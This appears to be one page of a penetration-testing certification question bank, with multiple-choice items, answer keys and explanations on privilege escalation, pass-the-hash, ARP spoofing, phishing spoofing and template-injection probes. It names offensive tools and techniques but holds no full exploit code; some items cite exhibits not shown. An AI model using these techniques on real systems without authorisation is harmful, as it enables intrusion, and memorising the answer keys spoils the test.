Option A is wrong because ASLR randomizes the stack base address, making it impossible to reliably predict where the NOP sled and shellcode reside, so the overwritten return address will likely point to an invalid location. Option B is wrong because return-to-libc typically requires knowing the runtime address of libc functions, which is randomized by ASLR; the PLT entry is a better target as it is resolved at load time and has a fixed address in the binary. Option D is wrong because a ROP chain can bypass ASLR only if you can leak a runtime address first (e.g., via an info leak), which is not provided in this scenario; without a leak, ROP cannot reliably locate gadgets in randomized memory regions.

563
MCQmedium

Which of the following best describes the primary purpose of a 'get-out-of-jail' letter in a penetration testing engagement?

A.To provide emergency contact information
B.To outline the rules of engagement
C.To authorize the tester to bypass security controls without legal repercussions
D.To ensure the tester does not steal data
AnswerC

It serves as proof of authorization.

Why this answer

The get-out-of-jail letter provides legal authorization and protects the tester if their actions are detected as malicious.

564
MCQeasy

A tester wants to crack a password hash using a wordlist combined with rules to generate variations. Which hashcat attack mode should be used?

A.-a 0 with -r
B.-a 3
C.-a 6
D.-a 1
AnswerA

-a 0 is dictionary attack; -r applies rules.

Why this answer

Mode 0 with rule files applies rules to a wordlist.

565
MCQeasy

A small business owner contacts you to perform a penetration test. The company has a single office with 50 employees, uses a cloud-based email service (Office 365), and hosts a public-facing website on a shared server. The owner is concerned about external threats but does not allow any testing that could disrupt operations. The owner wants to test the security of the website and the email system against common attacks, such as SQL injection, XSS, and phishing. Based on these constraints and the environment, which type of penetration test is most appropriate?

A.Covert red team exercise simulating a persistent attacker.
B.Full disclosure black-box test from an external perspective.
C.External gray-box test with a restricted schedule and prior notification.
D.Internal vulnerability assessment of the local network.
AnswerC

This allows focused testing with minimal disruption and aligns with client's constraints.

Why this answer

Given the owner's concern about disruption and the need to test external assets, a gray-box test (some information provided) with a schedule that avoids peak hours and with prior notification best balances effectiveness and risk. Black-box could be disruptive; red team is covert and may cause alarm; internal assessment is not relevant for external assets.

566
MCQmedium

During a penetration test, you are asked to identify all live hosts on a subnet. Which Nmap scan type is most likely to evade firewalls and determine if a host is up without completing the TCP handshake?

A.Ping sweep (-sn)
B.SYN scan (-sS)
C.TCP connect scan (-sT)
D.UDP scan (-sU)
AnswerB

Correct: half-open scan that doesn't complete handshake.

Why this answer

SYN scan (half-open) sends SYN packets and listens for SYN-ACK; it never completes the handshake, making it stealthier and useful for firewall evasion.

567
MCQmedium

After gaining a foothold on a Windows server, a tester wants to laterally move to another machine. The tester has obtained NTLM hashes and wants to execute commands remotely. Which tool is specifically designed for remote command execution using hashes via WMI?

A.evil-winrm
B.wmiexec
C.psexec
D.CrackMapExec
AnswerB

wmiexec uses WMI and supports pass-the-hash.

Why this answer

wmiexec.py (from Impacket) allows executing commands via WMI using NTLM hashes.

568
MCQhard

A penetration tester uses Shodan to find internet-facing devices belonging to a target company. Which of the following Shodan search filters would most effectively identify devices with a specific organization name?

A.hostname:company.com
B.ssl:company.com
C.org:CompanyName
D.net:192.168.0.0/16
AnswerC

The org filter directly searches by organization name as identified by Shodan's data.

Why this answer

The 'org' filter in Shodan allows searching by organization name, which is the most direct way to find devices associated with a company.

569
MCQmedium

A penetration tester is using theHarvester to gather email addresses associated with a target domain. The tool returns several email addresses. What is the primary limitation of using theHarvester for this purpose?

A.It requires authentication to the target's mail server
B.It only searches Google
C.It only finds publicly available email addresses
D.It cannot find subdomains
AnswerC

theHarvester collects from public sources, so internal emails are not found.

Why this answer

theHarvester collects data from public sources, so its results are limited to what is publicly available. It may miss internal email addresses and can include outdated information. It does not require authentication, and it is not limited to Google only.

570
MCQmedium

A penetration tester is planning a web application test. The client wants to minimize risk to production data. Which environment should the tester recommend for testing?

A.Development environment with live data
B.Production environment with a read-only database
C.Staging environment with anonymized data
D.Production environment with full access
AnswerC

Correct. Staging with anonymized data minimizes risk.

Why this answer

Testing in a staging environment reduces the risk of impacting live data and systems.

571
MCQeasy

A penetration testing firm is scoping a test for a client that has a hybrid infrastructure with on-premises servers and cloud-based virtual machines. The client insists on testing only the on-premises systems due to budget constraints. Which of the following should the penetration tester emphasize during the scoping discussion?

A.The on-premises systems are more critical, so testing them is sufficient.
B.Cloud systems are generally more secure and do not require testing.
C.Limiting the scope to on-premises may result in an incomplete risk picture because cloud systems are part of the attack surface.
D.Testing cloud systems would violate the shared responsibility model.
AnswerC

Both on-premises and cloud systems contribute to the overall attack surface; excluding one may leave critical vulnerabilities undetected.

Why this answer

Option C is correct because the client's hybrid infrastructure means that cloud-based virtual machines are part of the overall attack surface, and limiting the scope to on-premises systems ignores potential attack vectors such as misconfigured cloud APIs, insecure inter-VPC routing, or compromised cloud credentials that could lead to lateral movement into on-premises systems. A penetration test must assess all components that can be exploited to provide a complete risk picture, as cloud systems often serve as entry points or pivot points into the on-premises environment.

Exam trap

The trap here is that candidates may assume budget constraints justify limiting scope to on-premises, but the exam tests the principle that a penetration test must cover the entire attack surface to be valid, and cloud systems are a critical part of that surface in hybrid architectures.

How to eliminate wrong answers

Option A is wrong because it assumes on-premises systems are inherently more critical, which is a subjective and unsupported claim; in a hybrid infrastructure, cloud systems may host sensitive data or applications and can be the initial breach vector, so excluding them leaves critical risks unassessed. Option B is wrong because it incorrectly states that cloud systems are generally more secure and do not require testing; in reality, cloud systems are subject to misconfigurations (e.g., open S3 buckets, overly permissive IAM roles) and shared responsibility model gaps that require dedicated security testing.

572
MCQhard

A penetration tester is assessing a web application and wants to identify hidden parameters that the application accepts. Which tool is specifically designed for parameter discovery?

A.WPScan
B.Arjun
C.Nikto
D.Gobuster
AnswerB

Arjun is designed to find hidden GET and POST parameters by fuzzing and analyzing responses.

Why this answer

Arjun is a tool for discovering HTTP parameters by brute-forcing common parameter names and analyzing responses for changes, making it suitable for parameter discovery.

573
MCQeasy

A penetration tester is conducting passive reconnaissance and wants to find historical snapshots of a target website to identify past vulnerabilities or hidden endpoints. Which online service should the tester use?

A.Shodan
B.Censys
C.Wayback Machine
D.Pastebin
AnswerC

Correct. It provides historical website snapshots.

Why this answer

The Wayback Machine (archive.org) is the correct choice because it archives historical snapshots of websites, allowing a penetration tester to review past versions of a target site to identify previously exposed vulnerabilities, hidden endpoints, or outdated configurations. This aligns with passive reconnaissance, as the tester does not interact directly with the live target.

Exam trap

The trap here is that candidates may confuse passive reconnaissance tools like Shodan or Censys (which focus on live infrastructure) with the Wayback Machine, which is specifically designed for historical web content retrieval.

How to eliminate wrong answers

Option A is wrong because Shodan is a search engine for internet-connected devices and services (e.g., open ports, banners), not for historical website snapshots. Option B is wrong because Censys is a platform for discovering and analyzing internet-connected hosts and certificates, not for retrieving archived web pages. Option D is wrong because Pastebin is a text-sharing service often used for leaked data or code snippets, not for storing historical snapshots of entire websites.

574
Multi-Selectmedium

A penetration tester has obtained a set of NTLM hashes from a Windows domain. The tester wants to perform lateral movement to other systems. Which TWO tools can be used for this purpose? (Select TWO.)

Select 2 answers
A.pth-winexe
B.CrackMapExec
C.Responder
D.Nmap
E.Hashcat
AnswersA, B

pth-winexe executes commands on remote Windows systems using pass-the-hash.

Why this answer

CrackMapExec and pth-winexe both support pass-the-hash for lateral movement.

575
Drag & Dropmedium

Drag and drop the steps to perform a man-in-the-middle (MITM) attack using ARP spoofing with Bettercap into the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order

Why this order

ARP spoofing MITM requires enabling forwarding, spoofing both target and gateway, then capturing traffic.

576
MCQeasy

A penetration tester needs to describe a stored XSS vulnerability to a web developer who will fix it. Which level of detail is most appropriate for this audience?

A.Provide the CVSS score and risk rating.
B.Describe the business impact and potential regulatory fines.
C.Include the specific vulnerable URL, the request parameters, the payload used, and a code snippet for proper output encoding.
D.Use a graph showing the number of vulnerabilities by severity across the application.
AnswerC

This level of detail gives the developer everything needed to reproduce the vulnerability and apply the correct fix. It is precise and actionable.

Why this answer

Option C is correct because a web developer needs precise, actionable technical details to remediate the vulnerability: the exact URL, request parameters, the payload that triggered the stored XSS, and a code snippet showing proper output encoding (e.g., using OWASP ESAPI or context-specific escaping). This level of detail enables the developer to locate the vulnerable code, understand the injection point, and apply the correct fix without ambiguity.

Exam trap

The trap here is that candidates confuse the audience's needs: they may pick business impact (Option B) for a developer, but developers require technical details (Option C) to actually fix the code, not just awareness of consequences.

How to eliminate wrong answers

Option A is wrong because a CVSS score and risk rating provide a severity metric but no technical specifics about the vulnerable endpoint, input vector, or remediation steps, which a developer needs to fix the code. Option B is wrong because describing business impact and regulatory fines addresses management concerns but omits the technical details (e.g., the vulnerable parameter, payload, or encoding fix) required for a developer to remediate the stored XSS vulnerability.

577
MCQhard

A penetration tester has gained a low-privileged shell on a Linux server and discovers a binary with the SUID bit set owned by root. The binary executes a system command using a relative path without sanitizing user input. Which of the following techniques would the tester MOST likely use to escalate privileges?

A.Exploit a kernel vulnerability to gain root
B.Modify the PATH environment variable to point to a malicious script with the same name as the command called by the binary
C.Impersonate the root user using sudo
D.Preload a shared library using LD_PRELOAD
AnswerB

PATH hijacking leverages the SUID binary's use of a relative path; by placing a malicious executable earlier in PATH, the binary executes it with root privileges.

Why this answer

Option B is correct because the SUID binary executes a system command using a relative path without sanitizing user input. By modifying the PATH environment variable to include a directory containing a malicious script with the same name as the command, the tester can cause the binary to execute the attacker-controlled script instead of the intended system command, thereby escalating privileges to root when the SUID binary runs.

Exam trap

The trap here is that candidates may think kernel exploitation (Option A) is always the go-to for privilege escalation, but the question specifically describes a misconfigured SUID binary with a relative path and unsanitized input, making PATH hijacking the most direct and likely technique.

How to eliminate wrong answers

Option A is wrong because exploiting a kernel vulnerability is a different technique that does not leverage the specific misconfiguration of the SUID binary with a relative path and unsanitized input; it would be used if no such binary existed or if kernel exploits were available, but the question explicitly describes a binary that can be exploited via PATH hijacking. Option C is wrong because impersonating the root user using sudo requires the tester to already have sudo privileges or know the root password, which is not the case here; the tester has a low-privileged shell and cannot simply use sudo without proper authorization.

578
MCQmedium

A penetration tester gains a low-privilege shell on a Linux server. Using 'sudo -l', the tester finds that they can run '/usr/bin/vi' as root without a password. Which technique would the tester MOST likely use to escalate privileges?

A.Exploit a kernel vulnerability
B.Use vi to execute a shell as root
C.Modify a cron script
D.Perform PATH hijacking
AnswerB

vi can spawn a shell via ':!/bin/bash' when run with sudo.

Why this answer

GTFOBins lists vi as having a sudo escape, allowing privilege escalation by spawning a root shell. Other options are not directly applicable.

579
MCQeasy

A client requests a penetration test but only provides network diagrams and application credentials. Which type of test is being scoped?

A.Red team
B.Black box
C.Grey box
D.White box
AnswerC

Grey box testing involves limited information sharing, such as network diagrams and credentials.

Why this answer

A grey box test provides the tester with limited information such as network diagrams and credentials, which matches the scenario. Black box tests provide no information, white box tests provide full information, and red team engagements are a type of test, not a box color.

580
MCQhard

During a penetration test, you find a web application that uses JavaScript to make API calls. You want to discover hidden API endpoints and potential secrets (e.g., API keys) embedded in the client-side code. Which approach is most appropriate?

A.Download and analyze the JavaScript files
B.Perform a DNS zone transfer
C.Run a Nikto scan against the application
D.Use theHarvester to search for API endpoints
AnswerA

JavaScript analysis can reveal endpoints and secrets hardcoded in the code.

Why this answer

Option A is correct because JavaScript files in client-side web applications often contain hardcoded API endpoints, API keys, and other secrets that developers inadvertently leave in the source code. By downloading and analyzing these files (e.g., via browser developer tools or wget), you can discover hidden endpoints and sensitive tokens that are not exposed in the HTML or network traffic alone.

Exam trap

The trap here is that candidates may confuse information gathering techniques (e.g., DNS zone transfer or OSINT) with client-side code analysis, assuming that API endpoints must be found through network scanning rather than by examining the application's own source code.

How to eliminate wrong answers

Option B is wrong because DNS zone transfer is a network-level technique used to enumerate DNS records (e.g., subdomains) from a DNS server, not to extract API endpoints or secrets from client-side code. Option C is wrong because Nikto is a web server vulnerability scanner that checks for known vulnerabilities and misconfigurations, but it does not parse JavaScript files to find hidden API endpoints or embedded secrets. Option D is wrong because theHarvester is an OSINT tool designed to gather emails, subdomains, and other public information from search engines and PGP servers, not to analyze client-side JavaScript for API endpoints or secrets.

581
MCQhard

A tester decompiles a .NET application using dnSpy and finds a function that loads a serialized object from a file. Which vulnerability is most likely present?

A.Path traversal
B.SQL injection
C.Hardcoded credentials
D.Insecure deserialization
AnswerD

Deserializing untrusted data can lead to code execution.

Why this answer

The function loads a serialized object from a file, which is a classic indicator of insecure deserialization. In .NET, deserializing untrusted data without validation can allow an attacker to execute arbitrary code or manipulate application logic, as the runtime reconstructs objects from the serialized stream. dnSpy decompilation revealing this pattern directly points to the risk of insecure deserialization.

Exam trap

Cisco often tests the distinction between the action (loading a file) and the vulnerability (insecure deserialization), leading candidates to mistakenly choose path traversal because the file is loaded from disk, ignoring the core risk of deserializing untrusted objects.

How to eliminate wrong answers

Option A is wrong because path traversal involves manipulating file paths to access unauthorized directories, not the deserialization of objects from a file. Option B is wrong because SQL injection targets database queries through input injection, not the loading of serialized objects. Option C is wrong because hardcoded credentials refer to embedded usernames or passwords in source code, which is unrelated to the deserialization process.

582
MCQmedium

While exploiting a Windows machine, a tester gains a shell with limited privileges. They attempt to escalate privileges using a tool that exploits the SeImpersonatePrivilege. Which tool is specifically designed for this purpose on modern Windows versions?

A.Mimikatz
B.JuicyPotato
C.PrintSpoofer
D.PowerUp
AnswerC

PrintSpoofer is designed for Windows 10/2016+ using the print spooler bug.

Why this answer

PrintSpoofer exploits SeImpersonatePrivilege on Windows 10/Server 2016+ to gain SYSTEM.

583
MCQhard

A penetration tester has gained a low-privilege shell on a Windows server and discovered that the SeImpersonatePrivilege is enabled. Which of the following tools would be most appropriate to escalate privileges to SYSTEM-level access?

A.pth-winexe
B.PrintSpoofer
C.Responder
D.CrackMapExec
AnswerB

PrintSpoofer leverages SeImpersonatePrivilege to spawn a SYSTEM shell.

Why this answer

SeImpersonatePrivilege allows token impersonation. Tools like PrintSpoofer exploit this to gain SYSTEM privileges. Potato attacks (JuicyPotato) also work, but PrintSpoofer is more modern and reliable.

584
MCQmedium

The client's development team needs to reproduce a cross-site scripting (XSS) vulnerability discovered during the penetration test. They require the exact payload and step-by-step instructions. Which deliverable should the tester provide to meet this need?

A.Executive Summary
B.Detailed Vulnerability Report with reproduction steps
C.Rules of Engagement
D.Risk Assessment Matrix
AnswerB

This deliverable provides the technical depth required by the development team to understand and fix the vulnerability.

Why this answer

The correct answer is B because the development team needs the exact payload and step-by-step instructions to reproduce the XSS vulnerability. A Detailed Vulnerability Report with reproduction steps provides the precise technical details, including the payload string, input vectors, and browser behavior, enabling the team to replicate the issue in their environment. This aligns with the PT0-002 objective of delivering actionable findings for remediation.

Exam trap

The trap here is that candidates may confuse the Executive Summary (Option A) with a deliverable that contains technical details, but the exam expects you to know that reproduction steps belong in the detailed vulnerability report, not in a summary document.

How to eliminate wrong answers

Option A is wrong because an Executive Summary is a high-level overview for management, lacking the specific payload and step-by-step reproduction instructions needed by the development team. Option C is wrong because the Rules of Engagement define the scope, authorization, and constraints of the penetration test, not the technical details of a discovered vulnerability.

585
Multi-Selecthard

During an active reconnaissance phase, a penetration tester runs Nmap against a target and obtains the following results: Host is up, ports 22, 80, and 443 are open. The tester then runs a vulnerability scan using Nessus with unauthenticated credentials. Which THREE of the following issues should the tester be most concerned about regarding the accuracy and completeness of the Nessus scan results?

Select 3 answers
A.The Nmap results may have false positives for open ports
B.Nessus will only scan the top 1000 ports by default, potentially missing services on higher ports
C.Nessus might miss vulnerabilities that require authenticated access to detect
D.The vulnerability scan might not detect vulnerabilities in services not identified by Nmap
E.Nessus may produce false positives due to banner grabbing and version detection errors
AnswersC, D, E

Unauthenticated scans cannot check configuration issues or patch levels that require credentials.

Why this answer

Unauthenticated scans often miss vulnerabilities that require authentication, may produce false positives due to banner-based detection, and may not detect certain services that rely on authenticated checks. Nmap results are typically accurate for open ports. Missing open ports due to firewall is possible but less likely with Nmap SYN scan.

586
MCQmedium

A penetration tester is performing a social engineering campaign against a client. The tester wants to send a phishing email that bypasses the email security gateway and appears to come from an internal source. Which technique is most effective?

A.Set the Reply-To address to an attacker-controlled email
B.Insert a custom email header that mimics internal mail
C.Use a URL shortener to hide the malicious link
D.Register a similar domain and spoof the display name
AnswerA

This bypasses gateways because the sender appears legitimate, but replies go to the attacker.

Why this answer

Setting the Reply-To address to an attacker-controlled email is the most effective technique because many email security gateways (ESGs) perform SPF, DKIM, and DMARC validation on the SMTP envelope sender (Return-Path) but do not validate the Reply-To header. By spoofing the From address to an internal user and setting Reply-To to an attacker-controlled address, replies bypass the ESG's authentication checks while the email appears to come from an internal source, increasing the likelihood of user interaction.

Exam trap

The trap here is that candidates often confuse the Reply-To header with the From header, assuming that setting the Reply-To address is equivalent to spoofing the sender, when in fact the ESG's authentication checks focus on the From and envelope sender, not the Reply-To, making this a subtle but effective bypass.

How to eliminate wrong answers

Option B is wrong because inserting a custom email header that mimics internal mail does not bypass SPF/DKIM/DMARC validation; the ESG still checks the SMTP envelope sender and the From header against DNS records, so the email will likely be rejected or flagged. Option C is wrong because using a URL shortener hides the malicious link but does not address the ESG's authentication checks on the sender domain; the email still fails SPF/DKIM/DMARC if the From domain is spoofed, and many ESGs now block or sandbox shortened URLs. Option D is wrong because registering a similar domain and spoofing the display name only bypasses human inspection, not the ESG's automated checks; the ESG will still validate the actual domain in the From header against SPF/DKIM/DMARC records, and the similar domain will fail unless it is also configured with proper authentication records.

587
Multi-Selectmedium

A penetration tester is conducting an internal network assessment. The tester wants to perform a man-in-the-middle attack to capture credentials. Which TWO tools can be used for ARP spoofing?

Select 2 answers
A.Ettercap
B.Responder
C.Nmap
D.Bettercap
E.Hashcat
AnswersA, D

Ettercap is a classic ARP spoofing tool.

Why this answer

Bettercap and Ettercap are both capable of ARP spoofing.

588
MCQhard

Refer to the exhibit. A penetration tester is presenting this finding to a non-technical executive. Which improvement should be made to the description?

A.Include the CVSS vector
B.List the exact database tables affected
C.Add a proof-of-concept screenshot
D.Describe the business impact in plain language
AnswerD

Translating technical impact into business terms (e.g., financial, reputational risk) is essential for executive communication.

Why this answer

Describing the business impact in plain language helps executives understand the risk without technical jargon.

589
MCQhard

A client wants a penetration test that includes testing of their internal network, external perimeter, and wireless. However, they have a very limited budget. Which approach would best meet the client's needs while staying within budget?

A.Use vulnerability scanners for all three areas
B.Conduct a targeted test focusing on high-risk areas identified through threat modeling
C.Only test internal and external
D.Only test external and wireless
AnswerB

This balances coverage and cost by prioritizing the most critical assets.

Why this answer

Conducting a targeted test focused on high-risk areas identified through threat modeling allows coverage of all three areas with limited depth, maximizing value within budget. Skipping areas or using only automated tools may not meet the client's full requirements.

590
Multi-Selectmedium

A penetration tester is performing passive reconnaissance against a target domain. Which of the following resources can be used to gather information about the target without directly sending packets to the target's network? (Select two.) (Choose 2.)

Select 2 answers
A.Shodan
B.Nmap
C.WHOIS database
D.hping3
AnswersA, C

Shodan aggregates data from active scans and makes it available for passive research.

Why this answer

Shodan is a search engine that scans the internet for devices and services, indexing banners and metadata from publicly exposed systems. Since it queries its own pre-collected database rather than sending packets to the target's network, it qualifies as passive reconnaissance. This allows a penetration tester to discover open ports, services, and even specific vulnerabilities associated with the target domain without direct interaction.

Exam trap

The trap here is that candidates often confuse 'passive' with 'stealthy' and incorrectly choose Nmap with options like -sS (stealth SYN scan), but any direct packet transmission to the target's network, regardless of stealth, constitutes active reconnaissance.

591
MCQmedium

A penetration tester is performing a vulnerability scan on a target network. The tester uses Nmap with the default NSE scripts against a web server. The scan report shows several 'http-vuln-cve2017-5638' findings. What does this indicate?

A.The target is vulnerable to Apache Struts2 remote code execution
B.The target is vulnerable to the Heartbleed bug in OpenSSL
C.The target is vulnerable to the Shellshock Bash vulnerability
D.The target has a SQL injection vulnerability
AnswerA

The script specifically tests for the Struts2 vulnerability that allows unauthenticated remote code execution via Content-Type headers.

Why this answer

The Nmap script 'http-vuln-cve2017-5638' specifically targets the Apache Struts2 remote code execution vulnerability (CVE-2017-5638). This vulnerability exists in the Jakarta Multipart parser used by Apache Struts2, allowing an attacker to execute arbitrary commands via crafted Content-Type headers. The presence of this finding in the scan report indicates the web server is running a vulnerable version of Apache Struts2.

Exam trap

The trap here is that candidates may confuse the CVE number or the technology name, assuming any 'http-vuln-cve' script refers to a generic web vulnerability, when in fact each script is tied to a specific software and CVE, such as Apache Struts2 for CVE-2017-5638.

How to eliminate wrong answers

Option B is wrong because the Heartbleed bug (CVE-2014-0160) is a vulnerability in OpenSSL, not Apache Struts2, and is detected by Nmap scripts like 'ssl-heartbleed', not 'http-vuln-cve2017-5638'. Option C is wrong because the Shellshock Bash vulnerability (CVE-2014-6271) affects the Bash shell and is typically exploited via CGI scripts, not through Apache Struts2's Jakarta Multipart parser, and is detected by scripts such as 'http-shellshock'.

592
MCQmedium

Refer to the exhibit. A penetration tester is reviewing a web server error log. Based on the log, what vulnerability does the tester suspect?

A.Cross-site scripting
B.SQL injection
C.Remote code execution
D.Hardcoded credentials
AnswerD

The log reveals a database connection attempt with a username and password, suggesting credentials are hardcoded in the source code.

Why this answer

Option D is correct because the warning shows that a password is being used for database connection, and the message indicates hardcoded credentials (user 'test' with a password) are present in the code. Option A (XSS) is not evident. Option B (SQL injection) is not shown.

Option C (remote code execution) is not indicated.

593
MCQeasy

A penetration tester needs to provide a metric that communicates the financial risk of the identified vulnerabilities to the client's CFO. Which metric is most appropriate?

A.Annual Loss Expectancy (ALE).
B.CVSS base score.
C.Number of critical findings.
D.Technical difficulty of exploitation.
AnswerA

ALE expresses risk in financial terms, allowing the CFO to understand potential monetary impact and prioritize remediation spending.

Why this answer

Annual Loss Expectancy (ALE) is the most appropriate metric for communicating financial risk to a CFO because it quantifies the expected monetary loss per year from a vulnerability, calculated as ALE = Single Loss Expectancy (SLE) × Annualized Rate of Occurrence (ARO). This directly translates technical risk into financial terms, enabling informed budget decisions for remediation. CVSS base scores and critical finding counts lack a financial dimension, making them unsuitable for executive-level risk communication.

Exam trap

CompTIA often tests the misconception that technical severity scores (like CVSS) are sufficient for executive reporting, but the trap here is that financial risk requires a dollar-based metric like ALE, not a technical or count-based measure.

How to eliminate wrong answers

Option B is wrong because CVSS base score is a technical severity metric (0-10) based on exploitability and impact factors, not a financial measure; it does not incorporate asset value or loss frequency, so it cannot express monetary risk to a CFO. Option C is wrong because the number of critical findings is a raw count of high-severity vulnerabilities without any financial context; it ignores asset valuation, likelihood of exploitation, and potential loss, making it irrelevant for financial risk communication.

594
MCQeasy

A client wants a penetration test of their internal network. They are concerned about causing any disruption to the production systems. The tester should include which of the following in the rules of engagement to address this concern?

A.A list of all tools that will be used during the test
B.A clear definition of the testing window and contact information for emergency stop
C.A requirement for the client to disable their antivirus software
D.A statement that the tester will not be liable for any damages
AnswerB

This is essential to manage and halt testing if disruptions occur, aligning with client's concern.

Why this answer

Option B is correct because a clearly defined testing window with emergency stop contact information directly addresses the client's concern about production disruption. This ensures the tester can immediately halt activities if any instability is detected, aligning with the principle of minimizing operational impact during a penetration test.

Exam trap

The trap here is that candidates may mistakenly think listing tools or disabling antivirus is necessary for a thorough test, but the core concern is disruption prevention, which is directly addressed by the testing window and emergency stop clause in the RoE.

How to eliminate wrong answers

Option A is wrong because listing all tools used during the test does not prevent or mitigate disruption to production systems; it only provides transparency about the testing methodology. Option C is wrong because requiring the client to disable antivirus software would actually increase the risk of disruption, as it removes a critical security control that could detect and block malicious activity, potentially leading to unintended system instability or compromise.

595
MCQhard

A penetration tester receives pushback from a client's technical team regarding a finding, claiming it is not exploitable. Which of the following is the best response?

A.Escalate the issue to the executive without further discussion.
B.Provide additional evidence and offer to demonstrate the exploit in a controlled environment.
C.Downgrade the severity to low.
D.Remove the finding from the report to avoid conflict.
AnswerB

Demonstration proves exploitability.

Why this answer

Providing evidence and offering to demonstrate helps validate the finding and address concerns professionally.

596
MCQeasy

A penetration tester is preparing a report for a client. The client's C-suite executives need a high-level overview of the engagement results without technical jargon. Which section of the report is most appropriate for this audience?

A.Executive summary
B.Technical findings and remediation steps
C.Appendices with raw scan data
D.Methodology section
AnswerA

Provides high-level overview suitable for C-suite.

Why this answer

Option B is correct because the executive summary is designed for non-technical stakeholders, providing a high-level overview of findings and recommendations. Option A (Technical findings) contains detailed technical explanations not suitable for executives. Option C (Methodology) describes testing approach, not prioritized for executives.

Option D (Appendices) contain raw data not summarized.

597
MCQeasy

Which of the following tools would best assist a penetration tester in identifying known vulnerabilities in a WordPress installation?

A.OpenVAS
B.WPScan
C.Nessus
D.Nikto
AnswerB

WPScan is designed specifically for WordPress security assessments.

Why this answer

WPScan is specifically designed to enumerate and identify vulnerabilities in WordPress installations, including outdated plugins, themes, and core files. It uses a comprehensive database of WordPress CVEs and security issues, making it the most targeted tool for this task.

Exam trap

The trap here is that candidates often choose a general-purpose vulnerability scanner like Nessus or OpenVAS because they are familiar with them, but the question specifically asks for the best tool to identify known vulnerabilities in a WordPress installation, which requires a specialized scanner like WPScan.

How to eliminate wrong answers

Option A (OpenVAS) is wrong because it is a general-purpose vulnerability scanner that covers a wide range of systems and services, but it lacks the specialized WordPress-focused checks and plugin/theme enumeration that WPScan provides. Option C (Nessus) is wrong because, while it can detect some WordPress vulnerabilities, it is a broad-scope scanner that does not offer the deep, WordPress-specific fingerprinting and database of known vulnerabilities that WPScan does. Option D (Nikto) is wrong because it is a web server scanner that checks for common misconfigurations and outdated server software, but it does not perform the detailed WordPress core, plugin, and theme version analysis that WPScan excels at.

598
MCQmedium

During a penetration test, the tester finds that a web application is vulnerable to server-side template injection (SSTI). Which of the following payloads would be most effective to test for SSTI in an Express-based Node.js application using Handlebars?

A.{{7*7}}
B.{{7*'7'}}
C.<%= 7*7 %>
D.${7*7}
AnswerA

If SSTI is present, this will output 49.

Why this answer

In Handlebars, the expression {{7*7}} evaluates the multiplication directly, returning 49. This confirms SSTI because the server processes the template expression before rendering. Other payloads like {{7*'7'}} may cause type coercion errors or not execute in the same way, making {{7*7}} the most reliable test.

Exam trap

CompTIA often tests the distinction between server-side template syntax (Handlebars) and client-side or other framework syntaxes, so candidates mistakenly choose ERB or template literal payloads that are not processed by the server.

How to eliminate wrong answers

Option B ({{7*'7'}}) is wrong because in Handlebars, multiplying a number by a string may cause a type error or unexpected behavior, not a clean numeric result, making it less reliable for SSTI detection. Option C (<%= 7*7 %>) is wrong because this is an ERB-style tag used in Ruby or other frameworks, not in Handlebars or Express/Node.js. Option D (${7*7}) is wrong because this is JavaScript template literal syntax, which is client-side and not processed by the server-side Handlebars engine.

599
MCQeasy

A client wants to conduct a penetration test of their web application, but they are concerned about potential service disruption. They request that the tester avoid using any techniques that could cause the application to crash or become unresponsive. Which of the following should the tester include in the rules of engagement to address this requirement?

A.Specify that the tester will only use ACK scans and never send data payloads.
B.Include a clause that prohibits denial-of-service attacks and rate-limits all automated tools.
C.State that the tester will not use any automated tools and will perform only manual testing.
D.Do not include any specific limitation; the tester assumes responsibility for any outages.
AnswerB

Explicitly prohibiting DoS and implementing rate limits directly addresses the client's concern about service disruption.

Why this answer

Option B is correct because it directly addresses the client's concern by prohibiting denial-of-service attacks and implementing rate-limiting on automated tools. Rate-limiting prevents overwhelming the web application with requests, which could cause resource exhaustion or unresponsiveness, while the prohibition on DoS ensures no intentional disruption occurs. This aligns with the rules of engagement (RoE) requirement to scope the test safely.

Exam trap

The trap here is that candidates confuse 'avoiding service disruption' with 'avoiding all automated tools' or 'avoiding all payloads,' when the correct approach is to control the intensity of testing through rate-limiting and explicit prohibitions on disruptive techniques like DoS.

How to eliminate wrong answers

Option A is wrong because ACK scans are a type of port scan that can still cause service disruption if sent at high rates or to vulnerable services, and the statement 'never send data payloads' is overly restrictive and irrelevant to preventing crashes—many safe techniques (e.g., SQL injection payloads) require data but can be rate-limited. Option C is wrong because it unnecessarily bans all automated tools, which would severely limit the test's effectiveness; manual testing alone cannot efficiently cover a large web application, and automated tools can be safely used with rate-limiting and proper configuration.

600
Multi-Selectmedium

Which TWO of the following are appropriate ways to handle sensitive data discovered during a penetration test when producing the final report? (Select TWO.)

Select 2 answers
A.Include the raw sensitive data in an appendix with restricted distribution.
B.Encrypt the report with a strong password and email it to all stakeholders.
C.Label the entire report as 'Sensitive' and leave data unaltered.
D.Securely delete any copies of sensitive data after the report is delivered.
E.Redact or mask the sensitive data in the report.
AnswersD, E

This follows data minimization principles.

Why this answer

Options B and D are correct. Sensitive data should be sanitized in the report (e.g., redacted or anonymized), and any retained data should be securely destroyed after the report is delivered. Option A is wrong because assigning a separate sensitivity label is not a handling method.

Option C is wrong because including raw data increases risk. Option E is wrong because secure transmission is about delivery, not report content.

Page 7

Page 8 of 14

Page 9